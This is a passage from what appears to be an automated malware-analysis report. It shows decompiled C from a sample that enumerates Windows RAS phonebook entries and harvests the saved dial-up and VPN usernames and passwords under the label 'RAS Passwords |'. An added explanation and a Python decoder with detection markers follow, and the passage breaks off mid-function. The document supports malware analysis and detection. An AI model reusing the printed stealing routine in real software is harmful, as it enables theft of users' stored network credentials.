                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
                                    				intOrPtr _v4;
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				signed int _v56;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				signed int _v3024;
                                    				signed int _v3028;
                                    				signed int _v3032;
                                    				signed int _v3036;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				signed int _v3296;
                                    				signed int _v3300;
                                    				intOrPtr* _t114;
                                    				void* _t131;
                                    
                                    				_push(__ebx);
                                    				_push(__edx | _a82);
                                    				asm("popad");
                                    				if(__ecx + 1 < 0) {
                                    					_t131 = __eax;
                                    					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax); // RAS export resolved by name at runtime, then called through the returned pointer
                                    					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
                                    				} else {
                                    					_push(__ebp);
                                    					__ebp = __esp;
                                    					__esp = __esp + 0xfffff328;
                                    					_push(__ebx);
                                    					_push(__esi);
                                    					_push(__edi);
                                    					__edx = 0;
                                    					_v3296 = 0;
                                    					_v3300 = 0;
                                    					_v3036 = 0;
                                    					_v3032 = 0;
                                    					_v32 = 0;
                                    					_v36 = 0;
                                    					_v40 = 0;
                                    					_v48 = 0;
                                    					_v52 = 0;
                                    					_v56 = 0;
                                    					_v16 = __eax;
                                    					__eax = 0;
                                    					_push(__ebp);
                                    					_push(0x40861b);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = __esp;
                                    					_v16 = E00401AC0(_v16);
                                    					_v28 = E00407FF0();
                                    					__eflags = _v28;
                                    					if(_v28 != 0) {
                                    						__eax = _v20;
                                    						_push(_v20);
                                    						__eax =  &_v24;
                                    						__ecx = 1;
                                    						__edx =  *0x408214; // 0x408218
                                    						__eax = E00402FBC();
                                    						__esp = __esp + 4;
                                    						__edx = _v24;
                                    						__eax = 0x108; // 264 = sizeof(RASENTRYNAMEA), legacy layout (dwSize + szEntryName[257], padded)
                                    						 *_v24 = 0x108; // dwSize of the first entry, required by RasEnumEntries
                                    						__edx = 0x108 * _v20 >> 0x20;
                                    						__eax = 0x108 * _v20;
                                    						_v12 = 0x108 * _v20; // buffer size for _v20 entries
                                    						__eax =  &_v20;
                                    						_push( &_v20);
                                    						__eax =  &_v12;
                                    						_push( &_v12);
                                    						__eax = _v24;
                                    						_push(__eax);
                                    						_push(0);
                                    						_push(0);
                                    						L00407B84(); // argument order matches RasEnumEntriesA(NULL, NULL, lprasentryname, &cb, &count); the thunk's target is not named in this listing
                                    						__eflags = __eax;
                                    						if(__eax == 0) {
                                    							_v200.dwOSVersionInfoSize = 0x94; // 148 = sizeof(OSVERSIONINFOA)
                                    							 &_v200 = GetVersionExA( &_v200);
                                    							__eax =  &_v28;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v28, 0x105);
                                    							__eax =  &_v32;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v32, 0x105);
                                    							__eflags = _v200.dwPlatformId - 2;
                                    							if(_v200.dwPlatformId == 2) { // VER_PLATFORM_WIN32_NT
                                    								__eflags = _v200.dwMajorVersion - 5;
                                    								if(_v200.dwMajorVersion >= 5) { // Windows 2000 or later
                                    									_push(0);
                                    									_push(0x1a); // CSIDL_APPDATA (per-user phonebook location)
                                    									__eax =  &_v28;
                                    									__eax = E00401F9C( &_v28);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C(); // argument order matches SHGetSpecialFolderPathA(NULL, buf, csidl, FALSE); the thunk's target is not named in this listing
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3024;
                                    										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
                                    										__edx = _v3024;
                                    										 &_v28 = E00401B58( &_v28, _v3024);
                                    									}
                                    									_push(0);
                                    									_push(0x23);
                                    									__eax =  &_v32;
                                    									__eax = E00401F9C( &_v32);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C();
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3028;
                                    										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
                                    										__edx = _v3028;
                                    										 &_v32 = E00401B58( &_v32, _v3028);
                                    									}
                                    									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
                                    								}
                                    							}
                                    							_v36 = 0xffffffff;
                                    							__eax = _v20;
                                    							__eax = _v20 - 1;
                                    							__eflags = __eax;
                                    							if(__eax >= 0) {
                                    								_v52 = __eax;
                                    								__esi = 0;
                                    								__eflags = 0;
                                    								do {
                                    									_v1252 = 0x41c;
                                    									__esi = __esi << 5;
                                    									__ebx = (__esi << 5) + __esi;
                                    									__eax = _v24;
                                    									__eax = _v24 + 4 + __ebx * 8;
                                    									__edx =  &_v1248;
                                    									__ecx = 0x100;
                                    									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
                                    									_push( &_v36);
                                    									__eax =  &_v1252;
                                    									_push( &_v1252);
                                    									_push(0);
                                    									L00407B8C();
                                    									_v12 = 0x6e8;
                                    									__eax =  &_v3020;
                                    									__ecx = 0;
                                    									__edx = _v12;
                                    									E00401414( &_v3020, _v12) = _v12;
                                    									_v3020 = _v12;
                                    									 &_v12 =  &_v16;
                                    									__eax = _v24;
                                    									__edx = _v24 + 4 + __ebx * 8;
                                    									__ecx =  &_v3020;
                                    									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
                                    									__eflags = _v200.dwPlatformId - 2;
                                    									if(_v200.dwPlatformId == 2) {
                                    										__eflags = _v200.dwMajorVersion - 5;
                                    										if(_v200.dwMajorVersion >= 5) {
                                    											__eax = _v28;
                                    											__eflags =  *_v28;
                                    											if( *_v28 != 0) {
                                    												L17:
                                    												__eax =  &_v40;
                                    												__edx =  &_v1248;
                                    												__eax = E00401CAC( &_v40,  &_v1248);
                                    												__edx =  &_v44;
                                    												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
                                    												 &_v28 = E00401F9C( &_v28);
                                    												__eax = _v40;
                                    												__eax = E00401F48(_v40);
                                    												__edi = __eax;
                                    												__ebx = __eax;
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													__eax =  &_v32;
                                    													__eax = E00401F9C( &_v32);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v28 = E00401F9C( &_v28);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v32 = E00401F9C( &_v32);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx > 0) {
                                    													__eax = __ebx;
                                    													__edx = 0;
                                    													__eflags = 0;
                                    													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
                                    													__edx =  &_v3284;
                                    													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
                                    													__edi = 0x100;
                                    													__ebx = 0x40e9bc;
                                    													do {
                                    														__eax =  *__ebx;
                                    														__edx = _v48;
                                    														__eax = E00401E94( *__ebx, _v48);
                                    														if(__eflags == 0) {
                                    															__eflags =  *(__ebx + 4);
                                    															if( *(__ebx + 4) != 0) {
                                    																_t92 = __ebx + 4; // 0x0
                                    																__eax =  *_t92;
                                    																_push(E00401D50( *_t92));
                                    																_t93 = __ebx + 4; // 0x0
                                    																__eax =  *_t93;
                                    																__edx = E00401F48( *_t93);
                                    																__eax =  &_v476;
                                    																_pop(__ecx);
                                    																__eax = E00408038( &_v476, __ecx, __edx);
                                    															}
                                    														}
                                    														__ebx = __ebx + 8;
                                    														__edi = __edi - 1;
                                    														__eflags = __edi;
                                    													} while (__edi != 0);
                                    												}
                                    											} else {
                                    												__eax = _v32;
                                    												__eflags =  *_v32;
                                    												if( *_v32 != 0) {
                                    													goto L17;
                                    												}
                                    											}
                                    										}
                                    									}
                                    									__eax =  &_v733;
                                    									__eflags =  &_v733;
                                    									if( &_v733 != 0) {
                                    										__eax =  &_v476;
                                    										__eflags =  &_v476;
                                    										if( &_v476 != 0) {
                                    											__eax = _v8;
                                    											_push( *_v8);
                                    											_push("RAS Passwords |");
                                    											__eax =  &_v3288;
                                    											__edx =  &_v733;
                                    											__eax = E00401CAC( &_v3288,  &_v733);
                                    											_push(_v3288);
                                    											_push(0x40865c);
                                    											__eax =  &_v3292;
                                    											__edx =  &_v476;
                                    											__eax = E00401CAC( &_v3292,  &_v476);
                                    											_push(_v3292);
                                    											_push(0x40865c);
                                    											_push(0x408668);
                                    											__eax = _v8;
                                    											__edx = 7;
                                    											E00401E10();
                                    										}
                                    									}
                                    									__esi = __esi + 1;
                                    									_t105 =  &_v52;
                                    									 *_t105 = _v52 - 1;
                                    									__eflags =  *_t105;
                                    								} while ( *_t105 != 0);
                                    							}
                                    						}
                                    					}
                                    					__eax = 0;
                                    					__eflags = 0;
                                    					_pop(__edx);
                                    					_pop(__ecx);
                                    					_pop(__ecx);
                                    					 *[fs:eax] = __edx;
                                    					_push(E00408622);
                                    					__eax =  &_v3292;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3292, 2);
                                    					__eax =  &_v3028;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3028, 2);
                                    					__eax =  &_v48;
                                    					__edx = 3;
                                    					__eax = E00401AE4( &_v48, 3);
                                    					__eax =  &_v32;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v32, 2);
                                    					__eax =  &_v24;
                                    					__edx =  *0x408214; // 0x408218
                                    					return E00402FC8( &_v24, __edx);
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
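What the routine above does, read against the API list: it enumerates the RAS phonebook entries with RasEnumEntriesA into an array of 0x108-byte records (the pre-Windows-2000 RASENTRYNAMEA: DWORD dwSize plus CHAR szEntryName[257], padded), which is why the loop strides by (esi*33)*8 = 0x108 and copies the name from offset 4. For each entry it calls RasGetEntryDialParamsA with a 0x41C-byte buffer (_v1252 = 0x41c, the pre-NT4 RASDIALPARAMSA without dwSubEntry/dwCallbackId) and the BOOL output pre-set to 0xffffffff; that structure carries szUserName and szPassword, which is the stored dial-up/VPN credential. On Windows 2000 and later (dwPlatformId == 2, dwMajorVersion >= 5) it also builds paths under CSIDL_APPDATA (0x1a) and CSIDL_COMMON_APPDATA (0x23) and reads the integer DialParamsUID for the entry from the phonebook file with GetPrivateProfileIntA (the sub-path appended in E00407F4C is not visible in this excerpt; rasphone.pbk is the conventional file, an assumption here). The result is prefixed with "RAS Passwords |" and appended to the output string. The following Python decoder is an added example for analysts, not code from the sample or from the report: it parses both structures at the sizes the sample hard-codes, reproduces the GetPrivateProfileIntA lookup over a constructed phonebook, and checks a blob for the API and string markers listed for this function. The sample buffers and phonebook text are constructed test inputs.

```python
"""Decoder for the RAS structures the routine walks, plus a marker check.
Added example; not code from the sample or the report."""
import struct
import configparser

# Sizes the sample hard-codes: 0x108 is the pre-Windows-2000 RASENTRYNAMEA
# (DWORD dwSize + CHAR szEntryName[257], padded to 4 bytes), so the loop
# strides by (esi*33)*8 = 0x108 and reads the name at offset 4. 0x41C is the
# pre-NT4 RASDIALPARAMSA (no dwSubEntry/dwCallbackId), the size passed to
# RasGetEntryDialParamsA.
RASENTRYNAME_SIZE = 0x108
RASDIALPARAMS_SIZE = 0x41C
NAME_OFFSET = 4
NAME_MAX = 0x100           # the loop copies at most 0x100 bytes of the name

# Field layout of RASDIALPARAMSA: (offset, length) from the public definition.
DIAL_PARAM_FIELDS = {
    "szEntryName":      (4,    257),
    "szPhoneNumber":    (261,  129),
    "szCallbackNumber": (390,  129),
    "szUserName":       (519,  257),
    "szPassword":       (776,  257),
    "szDomain":         (1033,  16),
}


def _cstr(buf, off, length):
    """NUL-terminated ANSI string at buf[off:off+length]."""
    return bytes(buf[off:off + length]).split(b"\0", 1)[0].decode("latin-1")


def parse_ras_entry_names(buf):
    """Entry names from a RasEnumEntriesA output buffer (one per 0x108 record)."""
    names = []
    for off in range(0, len(buf) - RASENTRYNAME_SIZE + 1, RASENTRYNAME_SIZE):
        (dw_size,) = struct.unpack_from("<I", buf, off)
        if dw_size != RASENTRYNAME_SIZE:
            raise ValueError(f"unexpected dwSize {dw_size:#x} at {off:#x}")
        names.append(_cstr(buf, off + NAME_OFFSET, NAME_MAX))
    return names


def parse_ras_dial_params(rec):
    """Decode one RASDIALPARAMSA record as filled by RasGetEntryDialParamsA."""
    if len(rec) < RASDIALPARAMS_SIZE or struct.unpack_from("<I", rec)[0] != RASDIALPARAMS_SIZE:
        raise ValueError("not a 0x41C RASDIALPARAMSA record")
    return {k: _cstr(rec, off, ln) for k, (off, ln) in DIAL_PARAM_FIELDS.items()}


def dial_params_uid(pbk_text, entry):
    """GetPrivateProfileIntA(entry, "DialParamsUID", 0, phonebook) in Python:
    leading decimal integer of the value, 0 when the entry or key is missing."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(pbk_text)
    if not cp.has_option(entry, "DialParamsUID"):   # key lookup is case-insensitive
        return 0
    value = cp.get(entry, "DialParamsUID").strip()
    num = ""
    for ch in value:                                # optional sign, then digits
        if ch.isdigit() or (ch == "-" and not num):
            num += ch
        else:
            break
    return int(num) if num.strip("-") else 0


# Markers taken from the API and String IDs the report lists for this function.
RAS_STEALER_MARKERS = (b"RasEnumEntriesA", b"RasGetEntryDialParamsA",
                       b"DialParamsUID", b"RAS Passwords |")


def ras_stealer_markers(blob):
    """Which of the markers occur in a file image or memory dump."""
    return [m.decode() for m in RAS_STEALER_MARKERS if m in blob]


# Constructed inputs shaped like the Windows API output; not from the sample.
def build_entry_buffer(names):
    out = bytearray()
    for name in names:
        rec = bytearray(RASENTRYNAME_SIZE)
        struct.pack_into("<I", rec, 0, RASENTRYNAME_SIZE)
        enc = name.encode("latin-1")[:NAME_MAX - 1]
        rec[NAME_OFFSET:NAME_OFFSET + len(enc)] = enc
        out += rec
    return bytes(out)


def build_dial_params(**fields):
    rec = bytearray(RASDIALPARAMS_SIZE)
    struct.pack_into("<I", rec, 0, RASDIALPARAMS_SIZE)
    for k, v in fields.items():
        off, ln = DIAL_PARAM_FIELDS[k]
        enc = v.encode("latin-1")[:ln - 1]
        rec[off:off + len(enc)] = enc
    return bytes(rec)


SAMPLE_PBK = """[Office VPN]
Encoding=1
Type=2
DialParamsUID=4108
[Dialup ISP]
Encoding=1
"""

if __name__ == "__main__":
    buf = build_entry_buffer(["Office VPN", "Dialup ISP"])
    for name in parse_ras_entry_names(buf):
        print(name, dial_params_uid(SAMPLE_PBK, name))
    rec = build_dial_params(szEntryName="Office VPN", szUserName="alice", szPassword="hunter2")
    print(parse_ras_dial_params(rec))
```

Two points worth keeping in mind when using this on real data: the 0x108 and 0x41C sizes are the old structure versions compiled into the sample, so a phonebook dumped by a modern RASAPI32 with the current structure sizes (0x110 and 0x424) will not line up with these offsets; and DialParamsUID is only an index into the separately stored credential blob, so its presence in a phonebook says nothing about whether a password is saved, which is why the sample still calls RasGetEntryDialParamsA for every entry.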
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
• Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
• Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
• Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr* _v8;
                                    				signed int _v12;
                                    				char _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				char _v3024;
                                    				char _v3028;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				char _t130;
                                    				void* _t138;
                                    				CHAR* _t167;
                                    				void* _t181;
                                    				CHAR* _t185;
                                    				CHAR* _t190;
                                    				void* _t199;
                                    				void* _t201;
                                    				int _t215;
                                    				intOrPtr* _t216;
                                    				signed int* _t222;
                                    				void* _t223;
                                    				intOrPtr _t225;
                                    				intOrPtr _t230;
                                    				CHAR* _t253;
                                    				void* _t254;
                                    				signed int _t256;
                                    				void* _t259;
                                    
                                    				_t255 = __esi;
                                    				_t252 = __edi;
                                    				_t211 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v3288 = 0;
                                    				_v3292 = 0;
                                    				_v3028 = 0;
                                    				_v3024 = 0;
                                    				_v24 = 0;
                                    				_v28 = 0;
                                    				_v32 = 0;
                                    				_v40 = 0;
                                    				_v44 = 0;
                                    				_v48 = 0;
                                    				_v8 = __eax;
                                    				_push(_t259);
                                    				_push(0x40861b);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t259 + 0xfffff328;
                                    				E00401AC0(_v8);
                                    				_v20 = E00407FF0();
                                    				if(_v20 != 0) {
                                    					_push(_v20);
                                    					E00402FBC();
                                    					 *_v24 = 0x108;
                                    					_v12 = 0x108 * _v20;
                                    					_push( &_v20);
                                    					_push( &_v12);
                                    					_t130 = _v24;
                                    					_push(_t130);
                                    					_push(0);
                                    					_push(0);
                                    					L00407B84();
                                    					if(_t130 == 0) {
                                    						_v200.dwOSVersionInfoSize = 0x94;
                                    						GetVersionExA( &_v200);
                                    						E00402074( &_v28, 0x105);
                                    						E00402074( &_v32, 0x105);
                                    						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    							_push(0);
                                    							_push(0x1a);
                                    							_t199 = E00401F9C( &_v28);
                                    							_push(_t199);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t267 = _t199;
                                    							if(_t199 != 0) {
                                    								E00407F4C(_v28,  &_v3024, _t267);
                                    								E00401B58( &_v28, _v3024);
                                    							}
                                    							_push(0);
                                    							_push(0x23);
                                    							_t201 = E00401F9C( &_v32);
                                    							_push(_t201);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t268 = _t201;
                                    							if(_t201 != 0) {
                                    								E00407F4C(_v32,  &_v3028, _t268);
                                    								E00401B58( &_v32, _v3028);
                                    							}
                                    							E00407E40(_t211, 1, _t252, _t255, _t268);
                                    						}
                                    						_v36 = 0xffffffff;
                                    						_t138 = _v20 - 1;
                                    						if(_t138 >= 0) {
                                    							_v52 = _t138 + 1;
                                    							_t256 = 0;
                                    							do {
                                    								_v1252 = 0x41c;
                                    								_t214 = (_t256 << 5) + _t256;
                                    								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
                                    								_push( &_v36);
                                    								_push( &_v1252);
                                    								_push(0);
                                    								L00407B8C();
                                    								_v12 = 0x6e8;
                                    								E00401414( &_v3020, _v12);
                                    								_v3020 = _v12;
                                    								_t222 =  &_v3020;
                                    								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
                                    								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    									if( *_v28 != 0) {
                                    										L15:
                                    										E00401CAC( &_v40,  &_v1248);
                                    										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
                                    										_t167 = E00401F9C( &_v28);
                                    										_t253 = E00401F48(_v40);
                                    										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
                                    										if(_t215 == 0) {
                                    											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
                                    										}
                                    										if(_t215 == 0) {
                                    											_t190 = E00401F9C( &_v28);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
                                    										}
                                    										if(_t215 == 0) {
                                    											_t185 = E00401F9C( &_v32);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
                                    										}
                                    										if(_t215 > 0) {
                                    											E00402BC0( &_v3284, _t215, 0);
                                    											E00401D18( &_v48,  &_v3284, 0);
                                    											_t254 = 0x100;
                                    											_t216 = 0x40e9bc;
                                    											do {
                                    												E00401E94( *_t216, _v48);
                                    												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
                                    													_t87 = _t216 + 4; // 0x0
                                    													_push(E00401D50( *_t87));
                                    													_t88 = _t216 + 4; // 0x0
                                    													_t181 = E00401F48( *_t88);
                                    													_pop(_t223);
                                    													E00408038( &_v476, _t223, _t181);
                                    												}
                                    												_t216 = _t216 + 8;
                                    												_t254 = _t254 - 1;
                                    											} while (_t254 != 0);
                                    										}
                                    									} else {
                                    										_t274 =  *_v32;
                                    										if( *_v32 != 0) {
                                    											goto L15;
                                    										}
                                    									}
                                    								}
                                    								if( &_v733 != 0 &&  &_v476 != 0) {
                                    									_push( *_v8);
                                    									_push("RAS Passwords |");
                                    									E00401CAC( &_v3288,  &_v733);
                                    									_push(_v3288);
                                    									_push(0x40865c);
                                    									E00401CAC( &_v3292,  &_v476);
                                    									_push(_v3292);
                                    									_push(0x40865c);
                                    									_push(0x408668);
                                    									E00401E10();
                                    								}
                                    								_t256 = _t256 + 1;
                                    								_t100 =  &_v52;
                                    								 *_t100 = _v52 - 1;
                                    							} while ( *_t100 != 0);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t225);
                                    				 *[fs:eax] = _t225;
                                    				_push(E00408622);
                                    				E00401AE4( &_v3292, 2);
                                    				E00401AE4( &_v3028, 2);
                                    				E00401AE4( &_v48, 3);
                                    				E00401AE4( &_v32, 2);
                                    				_t230 =  *0x408214; // 0x408218
                                    				return E00402FC8( &_v24, _t230);
                                    			}

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				struct HINSTANCE__* _v16;
                                    				char _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v36;
                                    				void* _t47;
